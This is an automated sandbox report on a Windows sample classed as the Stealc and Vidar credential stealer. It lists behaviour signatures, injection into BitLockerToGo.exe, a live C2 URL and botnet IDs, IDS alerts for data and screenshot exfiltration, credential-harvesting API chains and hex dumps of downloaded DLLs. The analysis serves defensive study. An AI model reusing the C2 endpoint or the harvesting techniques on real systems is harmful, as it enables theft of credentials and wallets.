Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Setup-Pro.exe

Overview

General Information

Sample name:Setup-Pro.exe
Analysis ID:1531862
MD5:172cdb7dba672c53f3fae91ad779c940
SHA1:8025e4ac0cb3d692c5faebec737f8551df2a2666
SHA256:256372f3322cb5700e6ebbebebc9cac6877d0478f57260d32f2b0488df522cf9
Tags:exeuser-aachum
Infos:

Detection

Stealc, Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Searches for specific processes (likely to inject)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Setup-Pro.exe (PID: 7596 cmdline: "C:\Users\user\Desktop\Setup-Pro.exe" MD5: 172CDB7DBA672C53F3FAE91AD779C940)
    • BitLockerToGo.exe (PID: 7772 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar
{"C2 url": "http://45.66.249.162/9e6547173a597645.php", "Botnet": "v1"}
{"C2 url": "http://45.66.249.162/9e6547173a597645.php", "Botnet": "/55145c8889ec57f2/"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1586077537.0000000002900000.00000004.00001000.00020000.00000000.sdmpMsfpayloads_msf_9Metasploit Payloads - file msf.war - contentsFlorian Roth
    • 0x0:$x1: 4d5a9000030000000
    00000002.00000002.1836179324.0000000003000000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000002.00000002.1837091006.0000000003547000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.1585102260.0000000002600000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          00000000.00000003.1507758122.0000000002900000.00000004.00001000.00020000.00000000.sdmpMsfpayloads_msf_9Metasploit Payloads - file msf.war - contentsFlorian Roth
          • 0x0:$x1: 4d5a9000030000000
          Click to see the 12 entries
          SourceRuleDescriptionAuthorStrings
          2.2.BitLockerToGo.exe.3000000.0.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
            0.3.Setup-Pro.exe.2ab8000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security
              0.2.Setup-Pro.exe.27aa000.3.unpackJoeSecurity_StealcYara detected StealcJoe Security
                0.2.Setup-Pro.exe.27aa000.3.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
                  0.2.Setup-Pro.exe.27f8000.1.unpackJoeSecurity_StealcYara detected StealcJoe Security
                    Click to see the 5 entries
                    No Sigma rule has matched
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-11T22:32:24.595348+020020442451Malware Command and Control Activity Detected45.66.249.16280192.168.2.849707TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-11T22:32:24.589048+020020442441Malware Command and Control Activity Detected192.168.2.84970745.66.249.16280TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-11T22:32:25.054244+020020442461Malware Command and Control Activity Detected192.168.2.84970745.66.249.16280TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-11T22:32:45.684466+020020442491Malware Command and Control Activity Detected192.168.2.84970745.66.249.16280TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-11T22:32:26.111297+020020442481Malware Command and Control Activity Detected192.168.2.84970745.66.249.16280TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-11T22:32:25.066564+020020442471Malware Command and Control Activity Detected45.66.249.16280192.168.2.849707TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-11T22:32:24.119417+020020442431Malware Command and Control Activity Detected192.168.2.84970745.66.249.16280TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-11T22:32:26.575559+020028033043Unknown Traffic192.168.2.84970745.66.249.16280TCP
                    2024-10-11T22:32:32.372621+020028033043Unknown Traffic192.168.2.84970745.66.249.16280TCP
                    2024-10-11T22:32:34.428036+020028033043Unknown Traffic192.168.2.84970745.66.249.16280TCP
                    2024-10-11T22:32:36.031709+020028033043Unknown Traffic192.168.2.84970745.66.249.16280TCP
                    2024-10-11T22:32:37.553660+020028033043Unknown Traffic192.168.2.84970745.66.249.16280TCP
                    2024-10-11T22:32:40.731271+020028033043Unknown Traffic192.168.2.84970745.66.249.16280TCP
                    2024-10-11T22:32:42.144224+020028033043Unknown Traffic192.168.2.84970745.66.249.16280TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: 0.2.Setup-Pro.exe.2ab8000.8.raw.unpackMalware Configuration Extractor: StealC {"C2 url": "http://45.66.249.162/9e6547173a597645.php", "Botnet": "v1"}
                    Source: 0.2.Setup-Pro.exe.2ab8000.8.raw.unpackMalware Configuration Extractor: Vidar {"C2 url": "http://45.66.249.162/9e6547173a597645.php", "Botnet": "/55145c8889ec57f2/"}
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_03009B60 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,2_2_03009B60
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_03007240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,2_2_03007240
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_03018EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,2_2_03018EA0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_03009AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,2_2_03009AC0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0300C820 memset,lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcat,lstrcat,PK11_FreeSlot,lstrcat,2_2_0300C820
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_6CC86C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,2_2_6CC86C80
                    Source: Setup-Pro.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: Setup-Pro.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                    Source: Binary string: mozglue.pdbP source: BitLockerToGo.exe, 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr
                    Source: Binary string: freebl3.pdb source: freebl3.dll.2.dr, freebl3[1].dll.2.dr
                    Source: Binary string: freebl3.pdbp source: freebl3.dll.2.dr, freebl3[1].dll.2.dr
                    Source: Binary string: nss3.pdb@ source: BitLockerToGo.exe, 00000002.00000002.1858771961.000000006CEAF000.00000002.00000001.01000000.00000007.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr
                    Source: Binary string: BitLockerToGo.pdb source: Setup-Pro.exe, 00000000.00000003.1507758122.000000000299A000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.2.dr, softokn3.dll.2.dr
                    Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.2.dr, vcruntime140[1].dll.2.dr
                    Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.2.dr, msvcp140[1].dll.2.dr
                    Source: Binary string: nss3.pdb source: BitLockerToGo.exe, 00000002.00000002.1858771961.000000006CEAF000.00000002.00000001.01000000.00000007.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr
                    Source: Binary string: mozglue.pdb source: BitLockerToGo.exe, 00000002.00000002.1858544781.000000006CCED000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr
                    Source: Binary string: BitLockerToGo.pdbGCTL source: Setup-Pro.exe, 00000000.00000003.1507758122.000000000299A000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: softokn3.pdb source: softokn3[1].dll.2.dr, softokn3.dll.2.dr
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0300BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,2_2_0300BE70
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0300DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_0300DA80
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_03013EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,2_2_03013EA0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0300F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_0300F6B0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_030016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_030016D0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_03014910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_03014910
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0300E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,2_2_0300E430
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0300DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_0300DE10
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_0300ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,2_2_0300ED20
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_03014570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,2_2_03014570
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 2_2_030138B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,2_2_030138B0
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior

                    Networking

                    barindex
                    Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.8:49707 -> 45.66.249.162:80
                    Source: Network trafficSuricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.8:49707 -> 45.66.249.162:80
                    Source: Network trafficSuricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 45.66.249.162:80 -> 192.168.2.8:49707
                    Source: Network trafficSuricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.8:49707 -> 45.66.249.162:80
                    Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 45.66.249.162:80 -> 192.168.2.8:49707
                    Source: Network trafficSuricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.8:49707 -> 45.66.249.162:80
                    Source: Network trafficSuricata IDS: 2044249 - Severity 1 - ET MALWARE Win32/Stealc Submitting Screenshot to C2 : 192.168.2.8:49707 -> 45.66.249.162:80
                    Source: Malware configuration extractorURLs: http://45.66.249.162/9e6547173a597645.php
                    Source: Malware configuration extractorURLs: http://45.66.249.162/9e6547173a597645.php
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 11 Oct 2024 20:32:26 GMTContent-Type: application/x-msdos-programContent-Length: 1106998Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 12:30:30 GMTETag: "10e436-5e7ed3ec64580"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 11 Oct 2024 20:32:32 GMTContent-Type: application/x-msdos-programContent-Length: 685392Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 08:49:08 GMTETag: "a7550-5e7ea271b0900"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 11 Oct 2024 20:32:34 GMTContent-Type: application/x-msdos-programContent-Length: 608080Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 08:49:08 GMTETag: "94750-5e7ea271b0900"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 